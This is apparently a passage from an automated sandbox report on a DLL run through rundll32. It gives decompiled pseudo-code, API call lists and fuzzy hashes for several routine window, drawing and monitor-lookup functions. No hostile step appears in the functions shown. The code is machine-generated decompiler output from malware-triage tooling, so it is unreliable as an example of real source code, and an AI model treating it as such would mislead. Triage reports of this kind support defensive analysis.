                                                                                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                        • API String ID: 2657569430-3819984048
                                                                                                        • Opcode ID: 97235fdea7f486e5ac501621493e85bf53cf30b9c690d1141ec21583f6195202
                                                                                                        • Instruction ID: 19b7df90d523b32f1c3fb40a8f09f3825e5bbcba7fff12f7416c718068a45c80
                                                                                                        • Opcode Fuzzy Hash: 97235fdea7f486e5ac501621493e85bf53cf30b9c690d1141ec21583f6195202
                                                                                                        • Instruction Fuzzy Hash: D0313735D007229AF715DFB98CCA6453BE5FF44661B200A3BF819D29B1DB369440CF95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10005160, Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 222windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 87%
                                                                                                        			E10005160(intOrPtr* __esi, intOrPtr _a4) {
				struct tagRECT _v40;
				int _v44;
				void* _v48;
				CHAR* _v52;
				struct HMENU__* _v56;
				intOrPtr _v116;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t37;
				void* _t42;
				long _t45;
				int _t63;
				signed int _t93;
				void* _t95;
				struct HWND__* _t96;
				int _t121;
				void* _t135;
				signed int _t139;
				long _t140;
				CHAR* _t141;
				struct HWND__* _t142;
				intOrPtr* _t144;
				void* _t145;
				long _t155;

				_t144 = __esi;
				_push(_t135);
				_t93 = 0 | _a4 != 0x00000000;
				_t37 = E10005150();
				_t153 = _t37 - _t93;
				if(_t37 == _t93) {
					L5:
					return 0;
				} else {
					_push(SendMessageA( *(__esi + 0x20), 0x31, 0, 0));
					_v40.right = E10009228(_t93, __esi, _t135, __esi, _t153);
					_t42 = E1001F715(__esi);
					_t45 = E1000778D(_t153, E1001F715(__esi) + 1);
					_push(_t42 + 1);
					_push(_t45);
					_v40.left = _t45;
					E10011872(_t93, __esi, _t42 + 1, __esi, _t153);
					_t139 =  *0x1005be9c; // 0x50b001c4
					_t140 = _t139 & 0xefefff7f;
					if(_t93 == 0) {
						_t140 = _t140 | 0x00100080;
						_t155 = _t140;
					}
					_t95 = E1000E5E5(_t93,  *(_t144 + 0x20), _t145, GetParent( *(_t144 + 0x20)));
					GetWindowRect( *(_t144 + 0x20),  &(_v40.top));
					E10008D13(_t95,  &(_v40.top));
					_v48 = E1000E5E5(_t95, _t95, _t145, GetFocus());
					_v56 = E100116FB(_t144);
					_t96 = CreateWindowExA(0x200, "edit", 0, _t140, _v44, _v40.left, _v40.top.left - _v44, _v40.right - _v40.left,  *(_t95 + 0x20), _v56,  *(E1000AB19(_t95, _t140, _t144, _t155) + 8), 0);
					_t156 = _t96;
					if(_t96 != 0) {
						E100116BA(_t144, 0);
						_t141 = _v52;
						SetWindowTextA(_t96, _t141);
						_push(_t141);
						E10007788(_t96, _t141, _t144, __eflags);
						_t63 = _v44;
						__eflags = _t63;
						if(_t63 != 0) {
							SendMessageA(_t96, 0x30,  *(_t63 + 4), 0);
						}
						E10011716(_t144, _v44 + 1);
						_t142 = E1000E65F(_t96, _t144);
						SetWindowLongA(_t142, 0xfffffffc,  *( *((intOrPtr*)( *((intOrPtr*)( *_t144 + 0xf0))))()));
						E1000F2EF(_t144, __eflags, _t96);
						SendMessageA( *(E1000EFFA(_t144) + 0x20), 0x368, 0, 0);
						_v48 =  *((intOrPtr*)(_t144 + 0x60));
						SendMessageA( *(_t144 + 0x20), 0xcb, 1,  &_v48);
						GetClientRect( *(_t144 + 0x20),  &_v40);
						E100117F5(_t144, 0, 0, 0, 0, 0, 0x57);
						E100117F5(_t144, 0, 0, 0, 0, 0, 0x37);
						E100117F5(_t144, 0, 0, 0, 0, 0, 0x13);
						UpdateWindow( *(_t144 + 0x20));
						SetWindowPos(_t142, 0, 0, 0, 0, 0, 0x9f);
						DestroyWindow(_t142);
						_t121 =  *0x1005bea0; // 0xfffff
						SendMessageA( *(_t144 + 0x20), 0xc5, _t121, 0);
						__eflags = _v116 - _t144;
						if(_v116 == _t144) {
							E10011796(_t144);
						}
						E100180D5( *((intOrPtr*)(_t144 + 0x54)), 0, 0, 0, 1);
						return 1;
					} else {
						_push(_v48);
						E10007788(_t96, _t140, _t144, _t156);
						goto L5;
					}
				}
			}




























                                                                                                        0x10005160
                                                                                                        0x1000516f
                                                                                                        0x10005172
                                                                                                        0x10005175
                                                                                                        0x1000517a
                                                                                                        0x1000517c
                                                                                                        0x10005278
                                                                                                        0x1000527f
                                                                                                        0x10005182
                                                                                                        0x10005192
                                                                                                        0x1000519a
                                                                                                        0x1000519e
                                                                                                        0x100051b0
                                                                                                        0x100051bb
                                                                                                        0x100051bc
                                                                                                        0x100051bf
                                                                                                        0x100051c3
                                                                                                        0x100051c8
                                                                                                        0x100051ce
                                                                                                        0x100051d6
                                                                                                        0x100051d8
                                                                                                        0x100051d8
                                                                                                        0x100051d8
                                                                                                        0x100051f2
                                                                                                        0x100051f9
                                                                                                        0x10005206
                                                                                                        0x10005219
                                                                                                        0x10005222
                                                                                                        0x10005265
                                                                                                        0x10005267
                                                                                                        0x10005269
                                                                                                        0x10005286
                                                                                                        0x1000528b
                                                                                                        0x10005291
                                                                                                        0x10005297
                                                                                                        0x10005298
                                                                                                        0x1000529d
                                                                                                        0x100052a4
                                                                                                        0x100052a6
                                                                                                        0x100052b1
                                                                                                        0x100052b1
                                                                                                        0x100052c1
                                                                                                        0x100052cd
                                                                                                        0x100052e1
                                                                                                        0x100052ea
                                                                                                        0x10005309
                                                                                                        0x1000531e
                                                                                                        0x10005322
                                                                                                        0x1000532d
                                                                                                        0x10005341
                                                                                                        0x10005354
                                                                                                        0x10005367
                                                                                                        0x10005370
                                                                                                        0x10005386
                                                                                                        0x1000538d
                                                                                                        0x10005395
                                                                                                        0x100053a5
                                                                                                        0x100053a7
                                                                                                        0x100053ab
                                                                                                        0x100053af
                                                                                                        0x100053af
                                                                                                        0x100053bf
                                                                                                        0x100053ce
                                                                                                        0x1000526b
                                                                                                        0x1000526f
                                                                                                        0x10005270
                                                                                                        0x00000000
                                                                                                        0x10005275
                                                                                                        0x10005269

                                                                                                        APIs
                                                                                                        • SendMessageA.USER32 ref: 1000518C
                                                                                                          • Part of subcall function 10009228: __EH_prolog3_catch.LIBCMT ref: 1002A4F5
                                                                                                          • Part of subcall function 1001F715: lstrlenA.KERNEL32(00000000,00000000,?,1001F871,00000000,?,?), ref: 1001F71F
                                                                                                          • Part of subcall function 10011872: __EH_prolog3.LIBCMT ref: 10011879
                                                                                                          • Part of subcall function 10011872: GetWindowTextA.USER32 ref: 1001188F
                                                                                                        • GetParent.USER32(?), ref: 100051E2
                                                                                                        • GetWindowRect.USER32 ref: 100051F9
                                                                                                        • GetFocus.USER32 ref: 1000520B
                                                                                                        • CreateWindowExA.USER32 ref: 1000525F
                                                                                                        • SetWindowTextA.USER32(00000000,?), ref: 10005291
                                                                                                        • SendMessageA.USER32 ref: 100052B1
                                                                                                        • SetWindowLongA.USER32 ref: 100052E1
                                                                                                        • SendMessageA.USER32 ref: 10005309
                                                                                                        • SendMessageA.USER32 ref: 10005322
                                                                                                        • GetClientRect.USER32 ref: 1000532D
                                                                                                          • Part of subcall function 100117F5: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,10005346), ref: 1001181B
                                                                                                        • UpdateWindow.USER32(?), ref: 10005370
                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,0000009F), ref: 10005386
                                                                                                        • DestroyWindow.USER32(00000000), ref: 1000538D
                                                                                                        • SendMessageA.USER32 ref: 100053A5
                                                                                                          • Part of subcall function 10011796: SetFocus.USER32(?), ref: 1001179F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$MessageSend$FocusRectText$ClientCreateDestroyH_prolog3H_prolog3_catchLongParentUpdatelstrlen
                                                                                                        • String ID: edit$n^t
                                                                                                        • API String ID: 1316460492-3668187526
                                                                                                        • Opcode ID: 93b775d81ad1c7a8146c717d79b0fdc845a746f99c01990191f5c56cfddd1cdf
                                                                                                        • Instruction ID: f8b65c5ace38e4461a1bd77ccaf349567c0a92c9706a8189fdb74921955d5529
                                                                                                        • Opcode Fuzzy Hash: 93b775d81ad1c7a8146c717d79b0fdc845a746f99c01990191f5c56cfddd1cdf
                                                                                                        • Instruction Fuzzy Hash: 97619075704701ABE714DBB4CC9AF2F73A9EB88B40F004A1CF649AB2D1EA74F9018795
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1000BBFB, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 77libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 97%
                                                                                                        			E1000BBFB() {
				void* __ebx;
				void* __esi;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t18;
				void* _t20;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x10098d2c; // 0x0
				if(_t23 == 0) {
					_push(_t20);
					 *0x10098d30 = E1000BBA3(0, _t20, __eflags);
					_t18 = GetModuleHandleA("USER32");
					__eflags = _t18;
					if(_t18 == 0) {
						L12:
						 *0x10098d10 = 0;
						 *0x10098d14 = 0;
						 *0x10098d18 = 0;
						 *0x10098d1c = 0;
						 *0x10098d20 = 0;
						 *0x10098d24 = 0;
						 *0x10098d28 = 0;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						__eflags = _t6;
						 *0x10098d10 = _t6;
						if(_t6 == 0) {
							goto L12;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							__eflags = _t7;
							 *0x10098d14 = _t7;
							if(_t7 == 0) {
								goto L12;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								__eflags = _t8;
								 *0x10098d18 = _t8;
								if(_t8 == 0) {
									goto L12;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									__eflags = _t9;
									 *0x10098d1c = _t9;
									if(_t9 == 0) {
										goto L12;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										__eflags = _t10;
										 *0x10098d24 = _t10;
										if(_t10 == 0) {
											goto L12;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											__eflags = _t11;
											 *0x10098d20 = _t11;
											if(_t11 == 0) {
												goto L12;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												__eflags = _t12;
												 *0x10098d28 = _t12;
												if(_t12 == 0) {
													goto L12;
												} else {
													_t5 = 1;
													__eflags = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					 *0x10098d2c = 1;
					return _t5;
				} else {
					_t24 =  *0x10098d20; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}

















                                                                                                        0x1000bbfe
                                                                                                        0x1000bc04
                                                                                                        0x1000bc13
                                                                                                        0x1000bc1f
                                                                                                        0x1000bc2a
                                                                                                        0x1000bc2c
                                                                                                        0x1000bc2e
                                                                                                        0x1000bcc2
                                                                                                        0x1000bcc2
                                                                                                        0x1000bcc8
                                                                                                        0x1000bcce
                                                                                                        0x1000bcd4
                                                                                                        0x1000bcda
                                                                                                        0x1000bce0
                                                                                                        0x1000bce6
                                                                                                        0x1000bcec
                                                                                                        0x1000bc34
                                                                                                        0x1000bc40
                                                                                                        0x1000bc42
                                                                                                        0x1000bc44
                                                                                                        0x1000bc49
                                                                                                        0x00000000
                                                                                                        0x1000bc4b
                                                                                                        0x1000bc51
                                                                                                        0x1000bc53
                                                                                                        0x1000bc55
                                                                                                        0x1000bc5a
                                                                                                        0x00000000
                                                                                                        0x1000bc5c
                                                                                                        0x1000bc62
                                                                                                        0x1000bc64
                                                                                                        0x1000bc66
                                                                                                        0x1000bc6b
                                                                                                        0x00000000
                                                                                                        0x1000bc6d
                                                                                                        0x1000bc73
                                                                                                        0x1000bc75
                                                                                                        0x1000bc77
                                                                                                        0x1000bc7c
                                                                                                        0x00000000
                                                                                                        0x1000bc7e
                                                                                                        0x1000bc84
                                                                                                        0x1000bc86
                                                                                                        0x1000bc88
                                                                                                        0x1000bc8d
                                                                                                        0x00000000
                                                                                                        0x1000bc8f
                                                                                                        0x1000bc95
                                                                                                        0x1000bc97
                                                                                                        0x1000bc99
                                                                                                        0x1000bc9e
                                                                                                        0x00000000
                                                                                                        0x1000bca0
                                                                                                        0x1000bca6
                                                                                                        0x1000bca8
                                                                                                        0x1000bcaa
                                                                                                        0x1000bcaf
                                                                                                        0x00000000
                                                                                                        0x1000bcb1
                                                                                                        0x1000bcb3
                                                                                                        0x1000bcb3
                                                                                                        0x1000bcb3
                                                                                                        0x1000bcaf
                                                                                                        0x1000bc9e
                                                                                                        0x1000bc8d
                                                                                                        0x1000bc7c
                                                                                                        0x1000bc6b
                                                                                                        0x1000bc5a
                                                                                                        0x1000bc49
                                                                                                        0x1000bcb6
                                                                                                        0x1000bcc1
                                                                                                        0x1000bc06
                                                                                                        0x1000bc08
                                                                                                        0x1000bc12
                                                                                                        0x1000bc12

                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(USER32,?,?,?,1000BD47), ref: 1000BC24
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,1000BD47), ref: 1000BC40
                                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,1000BD47), ref: 1000BC51
                                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,1000BD47), ref: 1000BC62
                                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,1000BD47), ref: 1000BC73
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,1000BD47), ref: 1000BC84
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,1000BD47), ref: 1000BC95
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA,?,?,?,1000BD47), ref: 1000BCA6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                        • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                        • API String ID: 667068680-68207542
                                                                                                        • Opcode ID: 218cd20856afeff638e58877dca3a6b50e1afb1d124be69f089d893ca2cb3741
                                                                                                        • Instruction ID: a488cc10199e6142ec29f8114730dfd2e71765366de182c3c23aa3b245fff598
                                                                                                        • Opcode Fuzzy Hash: 218cd20856afeff638e58877dca3a6b50e1afb1d124be69f089d893ca2cb3741
                                                                                                        • Instruction Fuzzy Hash: 55214A70A06A24DAF749DF258DC4C69BBE5FB6A280361443FD10CD2394DB344A469FA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 100018E0, Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 214windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 88%
                                                                                                        			E100018E0(void* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				int _v24;
				char _v28;
				struct tagRECT _v56;
				char _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v92;
				struct HDC__* _v96;
				int _v100;
				int _v104;
				int _v116;
				int _v120;
				void* _v124;
				char _v128;
				struct tagRECT _v152;
				struct HICON__* _v156;
				int _v160;
				intOrPtr _v164;
				char _v168;
				intOrPtr _v184;
				int _v188;
				int _v192;
				int _v204;
				int _v208;
				char _v212;
				char _v220;
				char _v228;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t80;
				struct HICON__* _t90;
				int _t92;
				intOrPtr _t100;
				int _t109;
				intOrPtr _t111;
				void* _t128;
				int _t130;
				int _t144;
				int _t161;
				void* _t170;
				int _t172;
				void* _t174;
				void* _t175;
				void* _t178;
				signed int _t179;

				_t182 = __eflags;
				_push(0xffffffff);
				_push(0x10056da8);
				_push( *[fs:0x0]);
				_push(_t128);
				_push(_t174);
				_t80 =  *0x10072650; // 0xb5e27fef
				_push(_t80 ^ (_t179 & 0xfffffff8) - 0x00000058);
				 *[fs:0x0] =  &_v16;
				_t170 = __ecx;
				_push( *((intOrPtr*)(_a4 + 0x18)));
				_t175 = E10008F77(_t128,  *((intOrPtr*)(_a4 + 0x18)), __ecx, _t174, __eflags);
				GetClientRect( *(_t170 + 0x20),  &_v56);
				_t172 = _v56.right - _v56.left;
				_t130 = _v56.bottom - _v56.top;
				E1000AB19(_t130, _t172, _t175, _t182);
				_t90 = LoadIconA( *(E1000AB19(_t130, _t172, _t175, _t182) + 0xc), 1);
				_v96 = _t90;
				if(_t90 != 0) {
					_v104 = GetSystemMetrics(0xb);
					_t92 = GetSystemMetrics(0xc);
					_v100 = _t92;
					_v76 = 0;
					_v80 = 0x10059080;
					_v12 = 0;
					if(E10009236( &_v92, _t172, _t178, CreateCompatibleBitmap( *(_t175 + 4), _v104, _t92)) == 0) {
						L4:
						_v24 = 0xffffffff;
						_v92 = 0x10058e64;
					} else {
						E1000899B( &(_v56.top));
						_v24 = 1;
						if(E10008F85( &_v56, _t172, _t178, CreateCompatibleDC( *(_t175 + 4))) != 0) {
							_t100 = E10009304(_v56.top, _v92);
							__eflags = _t100;
							if(_t100 == 0) {
								goto L3;
							} else {
								_t144 = _t130 - 8;
								_t161 = _t172 - 8;
								_v100 = _t161;
								_v104 = _t144;
								StretchBlt(_v56.top, 0, 0, _v120, _v116,  *(_t175 + 4), 2, 2, _t161, _t144, 0xcc0020);
								DrawIcon(_v96, 0, 0, _v156);
								_v120 = 0;
								_v124 = 0x10059090;
								_v72 = 2;
								_v124 = GetStockObject(7);
								_v164 = E10009357(_t175,  &_v128);
								_t109 = _t130 - 4;
								_v160 = _t109;
								Rectangle( *(_t175 + 4), 0, 0, _t172 - 4, _t109);
								_t111 = _v184;
								__eflags = _t111;
								if(_t111 != 0) {
									E10009357(_t175, _t111);
								}
								_v152.left = 0;
								_v156 = 0x10059070;
								_v156 = GetStockObject(3);
								SetRect( &(_v152.right), _t172 - 4, 4, _t172, _t130);
								E10001360(_t175,  &(_v152.right),  &_v160);
								SetRect( &_v152, 4, _v188, _t172, _t130);
								E10001360(_t175,  &_v152,  &_v168);
								StretchBlt( *(_t175 + 4), 2, 2, _v188, _v192, _v152.bottom, 0, 0, _v208, _v204, 0xcc0020);
								_v220 = 0x10058e64;
								E10009289( &_v220);
								_v160 = 1;
								_v212 = 0x10058e64;
								E10009289( &_v212);
								_v160 = 0;
								E10008FE9( &_v188);
								_v160 = 0xffffffff;
								_v228 = 0x10058e64;
							}
						} else {
							L3:
							_v28 = 0;
							E10008FE9( &_v56);
							goto L4;
						}
					}
					_t90 = E10009289( &_v92);
				}
				 *[fs:0x0] = _v20;
				return _t90;
			}





















































                                                                                                        0x100018e0
                                                                                                        0x100018e6
                                                                                                        0x100018e8
                                                                                                        0x100018f3
                                                                                                        0x100018f7
                                                                                                        0x100018f8
                                                                                                        0x100018fa
                                                                                                        0x10001901
                                                                                                        0x10001906
                                                                                                        0x1000190c
                                                                                                        0x10001914
                                                                                                        0x1000191e
                                                                                                        0x10001925
                                                                                                        0x10001933
                                                                                                        0x10001937
                                                                                                        0x1000193b
                                                                                                        0x1000194b
                                                                                                        0x10001953
                                                                                                        0x10001957
                                                                                                        0x10001967
                                                                                                        0x1000196b
                                                                                                        0x10001973
                                                                                                        0x10001977
                                                                                                        0x1000197b
                                                                                                        0x10001983
                                                                                                        0x100019a3
                                                                                                        0x100019d9
                                                                                                        0x100019d9
                                                                                                        0x100019e1
                                                                                                        0x100019a5
                                                                                                        0x100019a9
                                                                                                        0x100019ae
                                                                                                        0x100019c9
                                                                                                        0x100019f8
                                                                                                        0x100019fd
                                                                                                        0x100019ff
                                                                                                        0x00000000
                                                                                                        0x10001a01
                                                                                                        0x10001a09
                                                                                                        0x10001a0d
                                                                                                        0x10001a1a
                                                                                                        0x10001a26
                                                                                                        0x10001a31
                                                                                                        0x10001a45
                                                                                                        0x10001a4b
                                                                                                        0x10001a53
                                                                                                        0x10001a5d
                                                                                                        0x10001a6f
                                                                                                        0x10001a7b
                                                                                                        0x10001a7f
                                                                                                        0x10001a8c
                                                                                                        0x10001a90
                                                                                                        0x10001a96
                                                                                                        0x10001a9a
                                                                                                        0x10001a9c
                                                                                                        0x10001aa1
                                                                                                        0x10001aa1
                                                                                                        0x10001aa8
                                                                                                        0x10001ab0
                                                                                                        0x10001ac0
                                                                                                        0x10001acf
                                                                                                        0x10001ae1
                                                                                                        0x10001af4
                                                                                                        0x10001b06
                                                                                                        0x10001b35
                                                                                                        0x10001b44
                                                                                                        0x10001b48
                                                                                                        0x10001b4d
                                                                                                        0x10001b56
                                                                                                        0x10001b5a
                                                                                                        0x10001b63
                                                                                                        0x10001b68
                                                                                                        0x10001b6d
                                                                                                        0x10001b75
                                                                                                        0x10001b75
                                                                                                        0x100019cb
                                                                                                        0x100019cb
                                                                                                        0x100019cf
                                                                                                        0x100019d4
                                                                                                        0x00000000
                                                                                                        0x100019d4
                                                                                                        0x100019c9
                                                                                                        0x10001b7d
                                                                                                        0x10001b7d
                                                                                                        0x10001b86
                                                                                                        0x10001b94

                                                                                                        APIs
                                                                                                        • GetClientRect.USER32 ref: 10001925
                                                                                                        • LoadIconA.USER32 ref: 1000194B
                                                                                                        • GetSystemMetrics.USER32 ref: 1000195F
                                                                                                        • GetSystemMetrics.USER32 ref: 1000196B
                                                                                                        • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 10001991
                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 100019B7
                                                                                                        • StretchBlt.GDI32(?,00000000,00000000,10059080,?,?,00000002,00000002,?,?,00CC0020), ref: 10001A31
                                                                                                        • DrawIcon.USER32 ref: 10001A45
                                                                                                        • GetStockObject.GDI32(00000007), ref: 10001A62
                                                                                                        • Rectangle.GDI32(?,00000000,00000000,?,?), ref: 10001A90
                                                                                                        • GetStockObject.GDI32(00000003), ref: 10001AB8
                                                                                                        • SetRect.USER32 ref: 10001ACF
                                                                                                        • SetRect.USER32 ref: 10001AF4
                                                                                                          • Part of subcall function 10008FE9: DeleteDC.GDI32(00000000), ref: 10008FFB
                                                                                                        • StretchBlt.GDI32(?,00000002,00000002,?,10059080,?,00000000,00000000,?,?,00CC0020), ref: 10001B35
                                                                                                          • Part of subcall function 10009289: DeleteObject.GDI32(00000000), ref: 10009298
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ObjectRect$CompatibleCreateDeleteIconMetricsStockStretchSystem$BitmapClientDrawLoadRectangle
                                                                                                        • String ID: n^t
                                                                                                        • API String ID: 3819712357-440804003
                                                                                                        • Opcode ID: d4a0fadfc0e7d5ff0c1524fd6e23814d727a6e98294ed68b7b34fef277336eb8
                                                                                                        • Instruction ID: 95c7e32fdb2d67d625ce792a260a26d7687ac2e919df4a9c96c8cb9d492619a0
                                                                                                        • Opcode Fuzzy Hash: d4a0fadfc0e7d5ff0c1524fd6e23814d727a6e98294ed68b7b34fef277336eb8
                                                                                                        • Instruction Fuzzy Hash: 8D811CB5608740AFE314DFA4C885F5BB7F8EB88B40F004A1DF69697290DB74E905CB66
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1000DFB9, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 176windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 89%
                                                                                                        			E1000DFB9(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E10011632(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t121 =  *(_t58 + 0x20);
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E1000BDA7(_t121, E1000BD3C(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = E10009B1B();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E1000BDA7(_t121, E1000BD3C(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t116 >= _v28.left) {
					if(_t123 + _t116 > _v28.right) {
						_t116 = _t108 - _v60.right + _v28.right;
					}
				} else {
					_t116 = _v28.left;
				}
				if(_t129 >= _v28.top) {
					if(_a4 + _t129 > _v28.bottom) {
						_t129 = _v60.top - _v60.bottom + _v28.bottom;
					}
				} else {
					_t129 = _v28.top;
				}
				return E100117F5(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}

























                                                                                                        0x1000dfb9
                                                                                                        0x1000dfb9
                                                                                                        0x1000dfc0
                                                                                                        0x1000dfc3
                                                                                                        0x1000dfcb
                                                                                                        0x1000dfce
                                                                                                        0x1000dfd3
                                                                                                        0x1000dfe1
                                                                                                        0x1000dff3
                                                                                                        0x1000dfe3
                                                                                                        0x1000dfe6
                                                                                                        0x1000dfe6
